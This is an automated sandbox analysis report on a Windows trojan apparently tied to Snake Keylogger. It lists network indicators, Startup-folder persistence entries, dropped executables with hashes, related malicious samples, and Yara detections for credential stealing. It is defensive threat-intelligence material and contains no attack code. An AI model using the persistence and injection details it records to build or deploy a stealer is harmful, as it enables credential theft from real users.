                                                      http://www.microsoft.EmbeddedExe2.exe, 00000006.00000002.2310531102.000000000677A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://checkip.dyndns.comEmbeddedExe2.exe, 00000006.00000002.2304736561.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000316F000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003154000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.000000000317C000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003162000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.drfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameEmbeddedExe2.exe, 00000006.00000002.2304736561.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.chiark.greenend.org.uk/~sgtatham/putty/0lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.0000000002881000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe1.exe.3.drfalse
                                                                high
                                                                https://reallyfreegeoip.org/xml/lecheries.exe, 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000002.2304736561.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, EmbeddedExe2.exe, 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp, lecheries.exe, 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EmbeddedExe2.exe.3.drfalse
                                                                  high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.16.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
193.122.6.168 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1587675
Start date and time: 2025-01-10 16:45:52 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 51s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 8kDIr4ZdNj.exe (renamed because the original name is a hash value)
Original Sample Name: d746bf8ebc1bc19872aafe6329fd3865332165c7ef477901e5cdf76e88e9931f.exe
Detection: MAL
Classification: mal100.troj.expl.evad.winEXE@22/15@2/2
EGA Information:
• Successful, ratio: 57.1%
HCA Information:
• Successful, ratio: 89%
• Number of executed functions: 60
• Number of non-executed functions: 282
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target EmbeddedExe2.exe, PID 6968 because it is empty
• Execution Graph export aborted for target RegSvcs.exe, PID 2300 because it is empty
• Execution Graph export aborted for target RegSvcs.exe, PID 3496 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
10:46:54 | API Interceptor | 75x Sleep call for process: EmbeddedExe2.exe modified
16:46:51 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lecheries.vbs
16:47:05 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\error_log.txt
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.16.1 | JNKHlxGvw4.exe | malicious | DCRat, PureLog Stealer, zgRAT | 188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
193.122.6.168 | 4iDzhJBJVv.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | ln5S7fIBkY.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | IMG_10503677.exe | malicious | MassLogger RAT | checkip.dyndns.org/
193.122.6.168 | Payment 01.08.25.pdf.exe | malicious | MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
193.122.6.168 | December Reconciliation QuanKang.exe | malicious | Unknown | checkip.dyndns.org/
193.122.6.168 | PO.exe | malicious | MassLogger RAT | checkip.dyndns.org/
193.122.6.168 | New order 2025.msg | malicious | PureLog Stealer, Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | file.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.6.168 | INQUIRY.exe | malicious | MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
193.122.6.168 | Technonomic.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/

Match | Associated Sample Name / URL | Detection | Threat Name | Context
checkip.dyndns.com | tx4pkcHL9o.exe | malicious | MassLogger RAT | 158.101.44.242
checkip.dyndns.com | New Order-090125.exe | malicious | MassLogger RAT, PureLog Stealer | 132.226.247.73
checkip.dyndns.com | 4iDzhJBJVv.exe | malicious | Snake Keylogger | 193.122.6.168
checkip.dyndns.com | ln5S7fIBkY.exe | malicious | GuLoader, Snake Keylogger | 193.122.6.168
checkip.dyndns.com | B3aqD8srjF.exe | malicious | Snake Keylogger | 193.122.130.0
checkip.dyndns.com | B7N48hmO78.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
checkip.dyndns.com | VIAmJUhQ54.exe | malicious | MassLogger RAT | 193.122.130.0
checkip.dyndns.com | bd9Gvqt6AK.exe | malicious | Snake Keylogger | 193.122.130.0
checkip.dyndns.com | Salary Payment Information Discrepancy_pdf.pif.exe | malicious | MassLogger RAT, PureLog Stealer | 193.122.130.0
checkip.dyndns.com | PO#17971.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 158.101.44.242
reallyfreegeoip.org | tx4pkcHL9o.exe | malicious | MassLogger RAT | 104.21.32.1
reallyfreegeoip.org | New Order-090125.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.64.1
reallyfreegeoip.org | 4iDzhJBJVv.exe | malicious | Snake Keylogger | 104.21.96.1
reallyfreegeoip.org | ln5S7fIBkY.exe | malicious | GuLoader, Snake Keylogger | 104.21.112.1
reallyfreegeoip.org | B3aqD8srjF.exe | malicious | Snake Keylogger | 104.21.48.1
reallyfreegeoip.org | B7N48hmO78.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.32.1
reallyfreegeoip.org | VIAmJUhQ54.exe | malicious | MassLogger RAT | 104.21.80.1
reallyfreegeoip.org | bd9Gvqt6AK.exe | malicious | Snake Keylogger | 104.21.80.1
reallyfreegeoip.org | Salary Payment Information Discrepancy_pdf.pif.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.48.1
reallyfreegeoip.org | PO#17971.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 104.21.96.1

Match | Associated Sample Name / URL | Detection | Threat Name | Context
ORACLE-BMC-31898US | 2V7usxd7Vc.exe | malicious | MassLogger RAT | 158.101.44.242
ORACLE-BMC-31898US | tx4pkcHL9o.exe | malicious | MassLogger RAT | 158.101.44.242
ORACLE-BMC-31898US | 4iDzhJBJVv.exe | malicious | Snake Keylogger | 193.122.6.168
ORACLE-BMC-31898US | ln5S7fIBkY.exe | malicious | GuLoader, Snake Keylogger | 193.122.6.168
ORACLE-BMC-31898US | B3aqD8srjF.exe | malicious | Snake Keylogger | 193.122.130.0
ORACLE-BMC-31898US | VIAmJUhQ54.exe | malicious | MassLogger RAT | 193.122.130.0
ORACLE-BMC-31898US | bd9Gvqt6AK.exe | malicious | Snake Keylogger | 193.122.130.0
ORACLE-BMC-31898US | Salary Payment Information Discrepancy_pdf.pif.exe | malicious | MassLogger RAT, PureLog Stealer | 193.122.130.0
ORACLE-BMC-31898US | PO#17971.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 158.101.44.242
ORACLE-BMC-31898US | IMG_10503677.exe | malicious | MassLogger RAT | 193.122.6.168
CLOUDFLARENETUS | 2V7usxd7Vc.exe | malicious | MassLogger RAT | 104.21.16.1
CLOUDFLARENETUS | NWPZbNcRxL.exe | malicious | FormBook | 188.114.97.3
CLOUDFLARENETUS | https://cjerichmond.jimdosite.com/ | malicious | Unknown | 162.159.128.70
CLOUDFLARENETUS | zE1VxVoZ3W.exe | malicious | FormBook | 188.114.96.3
CLOUDFLARENETUS | tx4pkcHL9o.exe | malicious | MassLogger RAT | 104.21.32.1
CLOUDFLARENETUS | https://zfrmz.com/3GiGYUP4BArW2NBgkPU3 | malicious | Unknown | 104.18.94.41
CLOUDFLARENETUS | Play_VM-NowTingrammAudiowav011.html | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | https://theleadking2435063.emlnk.com/lt.php?x=3DZy~GDHJaLL5a37-gxLhhGf13JRv_MkkPo2jHPMKXOh5XR.-Uy.xuO-2I2imNf | malicious | Unknown | 104.17.203.31
CLOUDFLARENETUS | New Order-090125.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.64.1
CLOUDFLARENETUS | 4iDzhJBJVv.exe | malicious | Snake Keylogger | 104.21.96.1

Match | Associated Sample Name / URL | Detection | Threat Name | Context
54328bd36c14bd82ddaa0c04b25ed9ad | 2V7usxd7Vc.exe | malicious | MassLogger RAT | 104.21.16.1
54328bd36c14bd82ddaa0c04b25ed9ad | tx4pkcHL9o.exe | malicious | MassLogger RAT | 104.21.16.1
54328bd36c14bd82ddaa0c04b25ed9ad | New Order-090125.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.16.1
54328bd36c14bd82ddaa0c04b25ed9ad | 4iDzhJBJVv.exe | malicious | Snake Keylogger | 104.21.16.1
54328bd36c14bd82ddaa0c04b25ed9ad | ln5S7fIBkY.exe | malicious | GuLoader, Snake Keylogger | 104.21.16.1
54328bd36c14bd82ddaa0c04b25ed9ad | B3aqD8srjF.exe | malicious | Snake Keylogger | 104.21.16.1
54328bd36c14bd82ddaa0c04b25ed9ad | B7N48hmO78.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.16.1
54328bd36c14bd82ddaa0c04b25ed9ad | VIAmJUhQ54.exe | malicious | MassLogger RAT | 104.21.16.1
54328bd36c14bd82ddaa0c04b25ed9ad | bd9Gvqt6AK.exe | malicious | Snake Keylogger | 104.21.16.1
54328bd36c14bd82ddaa0c04b25ed9ad | Salary Payment Information Discrepancy_pdf.pif.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.16.1

Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | filepdf.pdf.lnk.download.lnk | malicious | Unknown |
C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Invoice-UPS-218931.pdf.lnk.mal.lnk | malicious | Unknown |
Process: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1039
Entropy (8bit): 5.353332853270839
Encrypted: false
SSDEEP: 24:ML9E4KiE4Ko84qXKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKiHKoviYHKh3oPtHo6hAHKzeR
MD5: A4AF0F36EC4E0C69DC0F860C891E8BBE
SHA1: 28DD81A1EDDF71CBCBF86DA986E047279EF097CD
SHA-256: B038D4342E4DD96217BD90CFE32581FCCB381C5C2E6FF257CD32854F840D1FDE
SHA-512: A675D3E9DB5BDD325A22E82C6BCDBD5409D7A34453DAAEB0E37206BE982C388547E1BDF22DC70393C69D0CE55635E2364502572C3AD2E6753A56A5C3893F6D69
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type: CSV text
Category: dropped
Size (bytes): 226
                                                                      Entropy (8bit):5.360398796477698
                                                                      Encrypted:false
                                                                      SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                      MD5:3A8957C6382192B71471BD14359D0B12
                                                                      SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                      SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                      SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                      Malicious:false
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):1663264
                                                                      Entropy (8bit):6.929148215184974
                                                                      Encrypted:false
                                                                      SSDEEP:49152:Plp9tHfYoEaTSiz23THT3WSMpDgF/qB0Rj6KIeVSc/zui+:PX/LEQkF/qBk6K2c/ii+
                                                                      MD5:5EFEF6CC9CD24BAEEED71C1107FC32DF
                                                                      SHA1:3CFC9764083154F682A38831C8229E3E29CBE3EF
                                                                      SHA-256:E61B8F44AB92CF0F9CB1101347967D31E1839979142A4114A7DD02AA237BA021
                                                                      SHA-512:CECD98F0E238D7387B44838251B795BB95E85EC8D35242FC24532BA21929759685205133923268BF8BC0E2DED37DB7D88ECBE2B692D2BE6F09C6D92A57D1FDAC
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Joe Sandbox View:
                                                                      • Filename: filepdf.pdf.lnk.download.lnk, Detection: malicious, Browse
                                                                      • Filename: Invoice-UPS-218931.pdf.lnk.mal.lnk, Detection: malicious, Browse
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):134144
                                                                      Entropy (8bit):5.82580911380658
                                                                      Encrypted:false
                                                                      SSDEEP:3072:999yINAgKjV545jbvk5Hbe7fMuJN07TU2DzdKm+Dvb58mzmWuwvcXpY5bY:AINAgKjV5Cjbvk5Hbe7fMuJN07TKvbWS
                                                                      MD5:099EB488DBC2288AB41C4EF64EA7DBA4
                                                                      SHA1:BBE8B04FFE0E755DBEB28656057B4A92504B3DE6
                                                                      SHA-256:469EFD50AD0AF080469805BA5A2A2A253B968699E746D79B7AA1C98398C159A7
                                                                      SHA-512:B64AAFFC46CED9F2C9A2B7EFB501FB06BD9B4871B0091459035BC8EAA1F5AED331F66C435499892B2BCE00AA239815EBC160A37B3E79BA9235E9EF7EC894F77C
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, Author: Joe Security
                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, Author: Joe Security
                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, Author: Joe Security
                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, Author: unknown
                                                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, Author: Florian Roth
                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, Author: ditekSHen
                                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, Author: ditekSHen
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      Process:C:\Users\user\Desktop\8kDIr4ZdNj.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1474570
                                                                      Entropy (8bit):7.98865159238366
                                                                      Encrypted:false
                                                                      SSDEEP:24576:NGbesrWQ1WW/8y6N4DA2Wtt8iQAq6eftMtajDUYPDyDuskZYsf1QL:2esr1WaF6IWt1QYytMtajjYuVPM
                                                                      MD5:148510110C9D5C7FE1547E8C0C1ED175
                                                                      SHA1:EBA19F2D1410E5B54F4017A45FABE53A07991014
                                                                      SHA-256:B0E45BBB36082C3AE1DF2C02D953188142FE4AF955C6A8FD1A5A2F1CC53FE958
                                                                      SHA-512:9A398C03BE9D4C257F4259E7B1CC17F5C800A024B4A715AFC1BDA2D0099974CCA6E45951483092D501F848C4A4454C6AFC68CA6DA9F0346EFB68253ECCE417DA
                                                                      Malicious:false
                                                                      Process:C:\Users\user\Desktop\8kDIr4ZdNj.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):14552
                                                                      Entropy (8bit):7.628369076896627
                                                                      Encrypted:false
                                                                      SSDEEP:384:ITYznwreDrLYun6MkGodxWUtwFKJgWIxptQfkh:IAwaDrL4GNKwwg7tQ8h
                                                                      MD5:2536420BBC42872B770067FDAAB4FF1C
                                                                      SHA1:B8BC443C00D65605175A16F12CCCBC2175DA7681
                                                                      SHA-256:BF6487977C0FD86D9A2B8CCEDA81996DD379AA4E33EF455AA0DB98148B29CC5E
                                                                      SHA-512:4F9E55964870C1373FF358933815E9A1A4C392AEB452507B0988ADB7CBF85AD87E33D420341E94AAFA20D4DD42797E1A2349FB1DBCEECF109042B6D16D6135F6
                                                                      Malicious:false
                                                                      Process:C:\Users\user\AppData\Local\konked\lecheries.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1474570
                                                                      Entropy (8bit):7.98865159238366
                                                                      Encrypted:false
                                                                      SSDEEP:24576:NGbesrWQ1WW/8y6N4DA2Wtt8iQAq6eftMtajDUYPDyDuskZYsf1QL:2esr1WaF6IWt1QYytMtajjYuVPM
                                                                      MD5:148510110C9D5C7FE1547E8C0C1ED175
                                                                      SHA1:EBA19F2D1410E5B54F4017A45FABE53A07991014
                                                                      SHA-256:B0E45BBB36082C3AE1DF2C02D953188142FE4AF955C6A8FD1A5A2F1CC53FE958
                                                                      SHA-512:9A398C03BE9D4C257F4259E7B1CC17F5C800A024B4A715AFC1BDA2D0099974CCA6E45951483092D501F848C4A4454C6AFC68CA6DA9F0346EFB68253ECCE417DA
                                                                      Malicious:false
                                                                      Process:C:\Users\user\AppData\Local\konked\lecheries.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):14552
                                                                      Entropy (8bit):7.628369076896627
                                                                      Encrypted:false
                                                                      SSDEEP:384:ITYznwreDrLYun6MkGodxWUtwFKJgWIxptQfkh:IAwaDrL4GNKwwg7tQ8h
                                                                      MD5:2536420BBC42872B770067FDAAB4FF1C
                                                                      SHA1:B8BC443C00D65605175A16F12CCCBC2175DA7681
                                                                      SHA-256:BF6487977C0FD86D9A2B8CCEDA81996DD379AA4E33EF455AA0DB98148B29CC5E
                                                                      SHA-512:4F9E55964870C1373FF358933815E9A1A4C392AEB452507B0988ADB7CBF85AD87E33D420341E94AAFA20D4DD42797E1A2349FB1DBCEECF109042B6D16D6135F6
                                                                      Malicious:false
                                                                      Process:C:\Users\user\AppData\Local\konked\lecheries.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1474570
                                                                      Entropy (8bit):7.98865159238366
                                                                      Encrypted:false
                                                                      SSDEEP:24576:NGbesrWQ1WW/8y6N4DA2Wtt8iQAq6eftMtajDUYPDyDuskZYsf1QL:2esr1WaF6IWt1QYytMtajjYuVPM
                                                                      MD5:148510110C9D5C7FE1547E8C0C1ED175
                                                                      SHA1:EBA19F2D1410E5B54F4017A45FABE53A07991014
                                                                      SHA-256:B0E45BBB36082C3AE1DF2C02D953188142FE4AF955C6A8FD1A5A2F1CC53FE958
                                                                      SHA-512:9A398C03BE9D4C257F4259E7B1CC17F5C800A024B4A715AFC1BDA2D0099974CCA6E45951483092D501F848C4A4454C6AFC68CA6DA9F0346EFB68253ECCE417DA
                                                                      Malicious:false
                                                                      Process:C:\Users\user\AppData\Local\konked\lecheries.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):14552
                                                                      Entropy (8bit):7.628369076896627
                                                                      Encrypted:false
                                                                      SSDEEP:384:ITYznwreDrLYun6MkGodxWUtwFKJgWIxptQfkh:IAwaDrL4GNKwwg7tQ8h
                                                                      MD5:2536420BBC42872B770067FDAAB4FF1C
                                                                      SHA1:B8BC443C00D65605175A16F12CCCBC2175DA7681
                                                                      SHA-256:BF6487977C0FD86D9A2B8CCEDA81996DD379AA4E33EF455AA0DB98148B29CC5E
                                                                      SHA-512:4F9E55964870C1373FF358933815E9A1A4C392AEB452507B0988ADB7CBF85AD87E33D420341E94AAFA20D4DD42797E1A2349FB1DBCEECF109042B6D16D6135F6
                                                                      Malicious:false
                                                                      Process:C:\Users\user\Desktop\8kDIr4ZdNj.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1802240
                                                                      Entropy (8bit):7.6615204739221765
                                                                      Encrypted:false
                                                                      SSDEEP:49152:tfk5Hh4hrRsJ2jiQ6ZSYYl4dmXv+LldnYSnlpn7M:1AhM7OSx0m+flNQ
                                                                      MD5:9CAA0B032F7CC80C213C4ABA37B44BAF
                                                                      SHA1:9958A1F2C9DCBEA4FD20014D946E1F43EF4FD0FC
                                                                      SHA-256:B6909129E4A08A4287055E3660A7A132ED0E8CD32C528D2FEE2CE7B4D07E302C
                                                                      SHA-512:5F04A77C9E9FD782276260A00F96E2125FBF5BB08D0C9D81CFCA94986015B91F473882CFF46E6C67FB35B034B6B71B2386876AE88895E0A13A49FDA054601771
                                                                      Malicious:false
                                                                      Process:C:\Users\user\Desktop\8kDIr4ZdNj.exe
                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):143378
                                                                      Entropy (8bit):2.9922477781505763
                                                                      Encrypted:false
                                                                      SSDEEP:96:AIXLr4w+F05Bnv1SMi0Fl7dSA6zBqDkdGcu19I6yKup3PfrWVjjvqnBaAJZdjurC:H3bjn77+Gcu19I6yKup3nrWVHqnBaA
                                                                      MD5:DEC5B565C13833AE307CB8F290F304F6
                                                                      SHA1:A9ADBCA3C89CBBAB2A4A1B2315EF64B54B0F57F7
                                                                      SHA-256:FAB1B20589F1A83A562933EA0AA4139EFFDFC163291D01DA5A9EC92FE9E36D83
                                                                      SHA-512:0F69CCFBB203CF6FC840277E5C23C5BF71ABBA73A59421A364357CDE2295CA8CC063C3D6302BFBD5947E39AC8C0C2D8FD208FCA281D964E92D650F0381C0337A
                                                                      Malicious:false
                                                                      Process:C:\Users\user\Desktop\8kDIr4ZdNj.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):2382336
                                                                      Entropy (8bit):7.7164788849497
                                                                      Encrypted:false
                                                                      SSDEEP:49152:fu0c++OCvkGs9FacSc9fbFtWR1+0o8fyNq6UQruXZO1KgRudguKB+kyo3zJ57O1Y:GB3vkJ9Qc9jFs/QzNDogRudgLB/ySzry
                                                                      MD5:A031DA4BAE8BD9CF87C071C94F67D21B
                                                                      SHA1:29146F6E8D3107EB8CC5B362B15D8E57C3F815FB
                                                                      SHA-256:D746BF8EBC1BC19872AAFE6329FD3865332165C7EF477901E5CDF76E88E9931F
                                                                      SHA-512:BD84AC0D0D3A846B5EBA97D7A440F79034BDA7B381F836966561175E98AED3D87E194441DA0A19836C6ACB3EC8293970EFECB46767F303FD12956A0DB9FB0B42
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 66%
Preview:
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):354
                                                                      Entropy (8bit):4.519501589447018
                                                                      Encrypted:false
                                                                      SSDEEP:6:Ud6SdLGL29duGjjaAuN723fpdLSAz9lqpV+RM0Md6SdLXmPduGjjaAuN723fpdLk:GLC29dJjjLuaxdLvupV2uLwdJjjLuaxm
                                                                      MD5:C5574CA68C2AFD29DCDB25A3D5163EB2
                                                                      SHA1:B652555E6C4605C0D11CD5DD0E5F99DD893DCE69
                                                                      SHA-256:B705EA006DB84FD7976EE95C1925731D45C751C18ABE0FDDFD9D48469C0B00BF
                                                                      SHA-512:17C43F9AB54F2FAE23C9644CFAEFCED85345FB27BEF5748B78CF250256C6F17D59406809D575DF4DD12A6A25E1A58F0238792B1C197EB76D3F709363878CE37C
                                                                      Malicious:false
                                                                      Preview:Failed to extract resource EmbeddedExe1: The process cannot access the file 'C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe' because it is being used by another process..Failed to extract resource EmbeddedExe2: The process cannot access the file 'C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe' because it is being used by another process..
                                                                      Process:C:\Users\user\AppData\Local\konked\lecheries.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):278
                                                                      Entropy (8bit):3.3831375198427964
                                                                      Encrypted:false
                                                                      SSDEEP:6:DMM8lfm3OOQdUfclzXUEZ+lX1Ol+Rakm6nriIM8lfQVn:DsO+vNlDQ1rU4mA2n
                                                                      MD5:9313627D4F5A81392FF50BD3E3260432
                                                                      SHA1:1B513FC79C158671E37B2E7003F14A960961B3A0
                                                                      SHA-256:544FF47DA83650A68551E7C6DB44ABC750F161B5A307DAFB58D467CD7AF729FD
                                                                      SHA-512:6CC09C04BEE63B2A27FB30F17FC04D6CC3CDB5B7C40D2DC2E398FCF6F724AC40022126084CCF2DC8692DBDEA112F2F0C78211EE5A8A360709B615A3346ED6E9D
                                                                      Malicious:true
